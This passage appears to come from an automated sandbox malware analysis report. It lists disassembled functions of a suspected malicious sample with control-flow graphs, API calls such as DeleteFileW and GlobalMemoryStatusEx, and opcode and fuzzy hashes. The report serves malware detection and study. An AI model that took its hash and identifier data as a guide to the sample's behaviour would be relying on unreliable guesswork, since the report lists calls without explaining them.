                                                                                      control_flow_graph 1871 6484b71-6484ba4 1873 6484ba6-6484ba9 1871->1873 1874 6484bca-6484bcd 1873->1874 1875 6484bab-6484bc5 1873->1875 1876 64852ac-64852ae 1874->1876 1877 6484bd3-6484ccb 1874->1877 1875->1874 1879 64852b0 1876->1879 1880 64852b5-64852b8 1876->1880 1895 6484d4e-6484d55 1877->1895 1896 6484cd1-6484d1e call 648542a 1877->1896 1879->1880 1880->1873 1882 64852be-64852cb 1880->1882 1897 6484dd9-6484de2 1895->1897 1898 6484d5b-6484dcb 1895->1898 1909 6484d24-6484d40 1896->1909 1897->1882 1915 6484dcd 1898->1915 1916 6484dd6 1898->1916 1913 6484d4b-6484d4c 1909->1913 1914 6484d42 1909->1914 1913->1895 1914->1913 1915->1916 1916->1897
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 0aa526659fedd06e4946f47f6141818f55a5014c56c0fe6c0076d26c6ca30ed3
                                                                                      • Instruction ID: 36a277327228dbc8b3c22d5620a02f5db63b9a8df70620d5c41fdb090f4879ec
                                                                                      • Opcode Fuzzy Hash: 0aa526659fedd06e4946f47f6141818f55a5014c56c0fe6c0076d26c6ca30ed3
                                                                                      • Instruction Fuzzy Hash: DC518E70F102089FEB559FB5C854BAEBBF6EF88700F20852AE105EB395DA758C458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F58169 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2098 f58169-f581ba 2101 f581c2-f581ed DeleteFileW 2098->2101 2102 f581bc-f581bf 2098->2102 2103 f581f6-f5821e 2101->2103 2104 f581ef-f581f5 2101->2104 2102->2101 2104->2103
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F581E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: 75ef6bf651879cef9bf4f7b24b89ddb3e31741ca8fec850605c77e43a6c31a95
                                                                                      • Instruction ID: f782a5b0e4547bd8791319717a4fed0381c40c31096c6b46a6d4b123406a0544
                                                                                      • Opcode Fuzzy Hash: 75ef6bf651879cef9bf4f7b24b89ddb3e31741ca8fec850605c77e43a6c31a95
                                                                                      • Instruction Fuzzy Hash: 972144B1C0065A8FCB14CF9AC844BAEFBB4FF48320F10812AD958B7251D778A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F58170 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F581E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: cd90a587d24725002476835e537ccc0ac4f06e903c98f0213efbe2b0a2ac131f
                                                                                      • Instruction ID: d2e57bd942f2955f3e07e7e2e7e20745de92b3419ca0c6004fee25c451abe842
                                                                                      • Opcode Fuzzy Hash: cd90a587d24725002476835e537ccc0ac4f06e903c98f0213efbe2b0a2ac131f
                                                                                      • Instruction Fuzzy Hash: 711133B1C0065A9BCB10CF9AC444B9EFBF4BF48320F10812AD958B7240D778A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F5F0F8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F5F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 8555c16074b456528eb4f2e81bfc3cd06f28c4e7b02af149956fa57f64fdb475
                                                                                      • Instruction ID: 7ed1268af4f232391e3a97b8bb28c10445f2df344fd64f51e13db85bac5f5171
                                                                                      • Opcode Fuzzy Hash: 8555c16074b456528eb4f2e81bfc3cd06f28c4e7b02af149956fa57f64fdb475
                                                                                      • Instruction Fuzzy Hash: 8F1112B1D0066ADFCB10CFAAD444BDEFBF4AF48320F14816AD818A7651D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00F5F100 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F5F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 00bd2ad05883cf1e07c6263f24ace9305a42cf57361a33e006861a18e4c971ac
                                                                                      • Instruction ID: 8a38341ba51c9155e607f56033cf9dff66eab7f70e000e8cd23b315ccc3c5e1b
                                                                                      • Opcode Fuzzy Hash: 00bd2ad05883cf1e07c6263f24ace9305a42cf57361a33e006861a18e4c971ac
                                                                                      • Instruction Fuzzy Hash: 201120B1C00669DBCB10CFAAC444BDEFBF4AF48320F10816AD818A7241D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648DADD Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: c14f0c99729ffd1f239a24204166ec84208bc166753c86950c21200d7da0aa80
                                                                                      • Instruction ID: 4183fc2034fa256fac84666b3b7b1e7dcc31207444141396b7261d6c9229e185
                                                                                      • Opcode Fuzzy Hash: c14f0c99729ffd1f239a24204166ec84208bc166753c86950c21200d7da0aa80
                                                                                      • Instruction Fuzzy Hash: 7741BD30E112099FDB56EFA5C85469FBBB2EF85300F24452AE405EB390EB70D946CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064821D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: 6c06bf04e7260190e3fec586e3e6e3bbfac292fb02789f40a9e84f469653aec6
                                                                                      • Instruction ID: 165f15ccf58d06c1aa7f14befc307dbf265fe1fccb3bdf9d9fb651089ae976d2
                                                                                      • Opcode Fuzzy Hash: 6c06bf04e7260190e3fec586e3e6e3bbfac292fb02789f40a9e84f469653aec6
                                                                                      • Instruction Fuzzy Hash: FF31F030B102058FCB46AB74D5146AF7BE2AB89200F20846AD406DB394DE79DE46C7E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064882CF Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      • Opcode ID: caa13e6931d9fb1019c5806d44fcd21df110ab2c31a95fcc92cde148c3232301
                                                                                      • Instruction ID: a025dc81381ac9ad9d830a922ab9992225bda5e4b80d5e98c466067d0f4f13ee
                                                                                      • Opcode Fuzzy Hash: caa13e6931d9fb1019c5806d44fcd21df110ab2c31a95fcc92cde148c3232301
                                                                                      • Instruction Fuzzy Hash: 72F03035E00118DFDFA6BF54E9446EEB7B5FB40311F9844A3D801A7A54C3369D56CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06484A69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      • Opcode ID: f1d0ab7091ed151f631824cc71a7c75ce1101afa791d50d3e6fe5bca15f597c3
                                                                                      • Instruction ID: 00f768ff84d8bec491e34e8fab382bf1346064fa6f8681cea0ddee4ca9b9cee0
                                                                                      • Opcode Fuzzy Hash: f1d0ab7091ed151f631824cc71a7c75ce1101afa791d50d3e6fe5bca15f597c3
                                                                                      • Instruction Fuzzy Hash: 1BF0FE30E2012ADFDB54EF94E8597AEBBB2FF84700F24412AE402A7294CB741D05CBC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06486200 Relevance: .2, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ffca47d8249940bbabbbe17e151277f8d41e8d681a33529360cdd2202cb68a37
                                                                                      • Instruction ID: c8d92f377c9cac1a4af49c0cdae910e3e4cf44feefe7ddd2ea58477afb4d3a39
                                                                                      • Opcode Fuzzy Hash: ffca47d8249940bbabbbe17e151277f8d41e8d681a33529360cdd2202cb68a37
                                                                                      • Instruction Fuzzy Hash: 9F61C271F000214FDF55AA7DC884AAFEAD7AFC5610B26447AD80EDB364DE69DD0287C2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064842B2 Relevance: .2, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2010c94e74b590cd165a648c6bd916beedf0ec21001d062974e78a06a9155c4f
                                                                                      • Instruction ID: e13388ca00874385b8d7a091eb1ea54c8b3c86fd58896db9b2757192a68f8d33
                                                                                      • Opcode Fuzzy Hash: 2010c94e74b590cd165a648c6bd916beedf0ec21001d062974e78a06a9155c4f
                                                                                      • Instruction Fuzzy Hash: 4F815D30B0020A9FDB45EFA8D4506AEB7F6EF89304F148429D40ADB394EB34DC42CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064845D0 Relevance: .2, Instructions: 224COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5ec7b16566b7471f4c736978d69e8a670b14ba93050fbac31ab65af547039e3
                                                                                      • Instruction ID: ad80671674b04123c9c4a35dad9d1f07d7deca553f666a071b8c5b0b1fc55437
                                                                                      • Opcode Fuzzy Hash: c5ec7b16566b7471f4c736978d69e8a670b14ba93050fbac31ab65af547039e3
                                                                                      • Instruction Fuzzy Hash: D7A14F34E1021A8FDF61DF68C890B9EB7B1FF85300F208596D549AB395EB70A985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064845E8 Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 236dc8982ce5fa71de559ba05bf504478af71ba9464d39f3d12d0ed02e57c511
                                                                                      • Instruction ID: 9ef235776576e879c5ff590e40548e00af2ccc9ca7e3859732f01fa05dda76bd
                                                                                      • Opcode Fuzzy Hash: 236dc8982ce5fa71de559ba05bf504478af71ba9464d39f3d12d0ed02e57c511
                                                                                      • Instruction Fuzzy Hash: 12913C34E1021A8FDF61DF68C880B9EB7B1FF89300F208595D549AB355EB70AA85CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648EF38 Relevance: .2, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 868a335000895f013ed6d9b45b0d989f7fb5a5efa2acd204785bfb6d71496ff5
                                                                                      • Instruction ID: 0f026129674d421ecd1198fc1cf178fbf413a78220ef32df9cb7fe6e63846853
                                                                                      • Opcode Fuzzy Hash: 868a335000895f013ed6d9b45b0d989f7fb5a5efa2acd204785bfb6d71496ff5
                                                                                      • Instruction Fuzzy Hash: EB714F70A001099FDB55EFA9D990AAEBBF6FF84300F14856AE405EB355DB30ED46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648EF48 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 476f1733d6c821d24e4195c7b67ec84db0ada63ea3002b2442414322b646b42a
                                                                                      • Instruction ID: 12f67b16358834b16da9e802d34a80e75ad362269ba9733866c35dfe78f4d899
                                                                                      • Opcode Fuzzy Hash: 476f1733d6c821d24e4195c7b67ec84db0ada63ea3002b2442414322b646b42a
                                                                                      • Instruction Fuzzy Hash: E2714F70A002099FDB55EFA9D990A9EBBF6FF84300F24856AE405EB355DB30ED46CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648FCA1 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe8cd2089ac52201f633a9351c518e9e6a510c129304b5ef899de5b74ff7c506
                                                                                      • Instruction ID: 357a23c79b303cb1fc14520ce471e105eaafa2c808ba63b7e2c27a3c762ef616
                                                                                      • Opcode Fuzzy Hash: fe8cd2089ac52201f633a9351c518e9e6a510c129304b5ef899de5b74ff7c506
                                                                                      • Instruction Fuzzy Hash: C351F131E00109DFDBA4BB78E4446AEBBB2FB84355F20886AE10AD7351DB359959CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648FA50 Relevance: .2, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f234ef6e77827ee9f4f41ccb82069f84845fe408f78fe3e830dc1fd196fd4075
                                                                                      • Instruction ID: d9aae4a71226cc4a6cd5ed43f9264c6ab18fe88050b912d12446cb8252ad708f
                                                                                      • Opcode Fuzzy Hash: f234ef6e77827ee9f4f41ccb82069f84845fe408f78fe3e830dc1fd196fd4075
                                                                                      • Instruction Fuzzy Hash: 9451EA30B102049FEFA6777CD95476F265EE789390F20482BE50AD33D5DA69CC49C3A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648FA60 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad8c6413c0cfdb2fcd39ec5adcc7f705398aa4ec4838d1a1f6598f87db40504b
                                                                                      • Instruction ID: 6c3201093ca36b137e5473eb54a86aba81c97de1c94973bb4cc53be964d95aa8
                                                                                      • Opcode Fuzzy Hash: ad8c6413c0cfdb2fcd39ec5adcc7f705398aa4ec4838d1a1f6598f87db40504b
                                                                                      • Instruction Fuzzy Hash: AA51DB30B202049FEFA6776CD95472F265EE789390F20483BE50AD33D9DA69CC49D392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648542A Relevance: .1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cc855e929e29f66b70722b36bacdb4ffe69f1ccc46663254acdc072dc8dedc61
                                                                                      • Instruction ID: 50ca5d03de7322f6f6d83d51b928f24ed56012a77ad658e69d7c5ab56f4dac6a
                                                                                      • Opcode Fuzzy Hash: cc855e929e29f66b70722b36bacdb4ffe69f1ccc46663254acdc072dc8dedc61
                                                                                      • Instruction Fuzzy Hash: F6415971E003098FDBB5DEA9D880AAFFBB2EB84310F10492AE156D7654D330E959CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 064855A8 Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ca21efa93a981e93db643781b41591597d861084bfe8a37a595a70f22e73c83
                                                                                      • Instruction ID: c117fa82306d54492493a93497b31f200497e2a08de62f260e9601044eebc369
                                                                                      • Opcode Fuzzy Hash: 9ca21efa93a981e93db643781b41591597d861084bfe8a37a595a70f22e73c83
                                                                                      • Instruction Fuzzy Hash: 25317230E002058FDFBAAF69C4C066FBBB1EB45320F61996BD459EB342C634D941CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06482088 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab405fe8307c7ed0bae39ad68814eb2f6b8886ce221a66488c4023a4a856600b
                                                                                      • Instruction ID: 07426f8a71b21f296999cb6304afe3c057720cc6b864996ac75adf9130f6c2c4
                                                                                      • Opcode Fuzzy Hash: ab405fe8307c7ed0bae39ad68814eb2f6b8886ce221a66488c4023a4a856600b
                                                                                      • Instruction Fuzzy Hash: DF314F30E106069FDB55DFA4D8546AFBBF2FF89300F14852AE906A7350DBB1A942CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06482098 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a77ee8f70eee3a8ea21e665c9ce1f84dc32a7ab10a66c5dc8d1579542d9347f7
                                                                                      • Instruction ID: 94a9c1fb20e707c623fa413d2f3f52b9864b1d37e00450b1f31b6851559a5ed5
                                                                                      • Opcode Fuzzy Hash: a77ee8f70eee3a8ea21e665c9ce1f84dc32a7ab10a66c5dc8d1579542d9347f7
                                                                                      • Instruction Fuzzy Hash: ED317E30E106069FCB56DFA4D85469FB7F2BF89300F24852AE906E7340DBB1AD42CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483EB9 Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4e07c23074598ad29e857bea5abb09589b6baf7a7070219a959b7e37c3470d7
                                                                                      • Instruction ID: 9b71b924c292a406c4cd4e194e7fc4889ed37f2e9ca62c4992a1b84a8e854386
                                                                                      • Opcode Fuzzy Hash: e4e07c23074598ad29e857bea5abb09589b6baf7a7070219a959b7e37c3470d7
                                                                                      • Instruction Fuzzy Hash: 1F213B75F006159FDB42DFA8D880AAEBBF2EB48710F148066E905EB394E735D912CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483EC8 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 913a617173b930b2a2bcede2492f55b83dbf5785164225c7021f732a93e2aad5
                                                                                      • Instruction ID: 87e306753df405f8b301372f6bf43eb765c364162e1695416a0951a1354f96c9
                                                                                      • Opcode Fuzzy Hash: 913a617173b930b2a2bcede2492f55b83dbf5785164225c7021f732a93e2aad5
                                                                                      • Instruction Fuzzy Hash: 18219C75F006059FDB42EFA8D880AAEB7F2FB48710F14806AEA05E7350E735D801CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00B7D044 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4118257509.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_b7d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3bcc986f2a9db89436c353da362745bc069b1355f2bfb84cc65d310a128bd8b2
                                                                                      • Instruction ID: 4353174da9d96aee7741ba462623df412f3880ee0cfb4c24a8c82e74ea18c8ef
                                                                                      • Opcode Fuzzy Hash: 3bcc986f2a9db89436c353da362745bc069b1355f2bfb84cc65d310a128bd8b2
                                                                                      • Instruction Fuzzy Hash: F121FF71604204EFCB14DF24C9D4B26BBB5FF84354F24C6ADE84E4B292C73AD846CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0648420F Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 377fa7cb1b099917afa2a500e3ce69822d3ac4f0d964337a26d9786982d4d27a
                                                                                      • Instruction ID: 8a4298d5439266d174c891c52badf735f437e1b496f548b995d03ec7d294026b
                                                                                      • Opcode Fuzzy Hash: 377fa7cb1b099917afa2a500e3ce69822d3ac4f0d964337a26d9786982d4d27a
                                                                                      • Instruction Fuzzy Hash: D001F530B041111FDB66A6BDA810BAFBBDADBC6750F14447BF50AC7751DA29CC028391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06483FD8 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
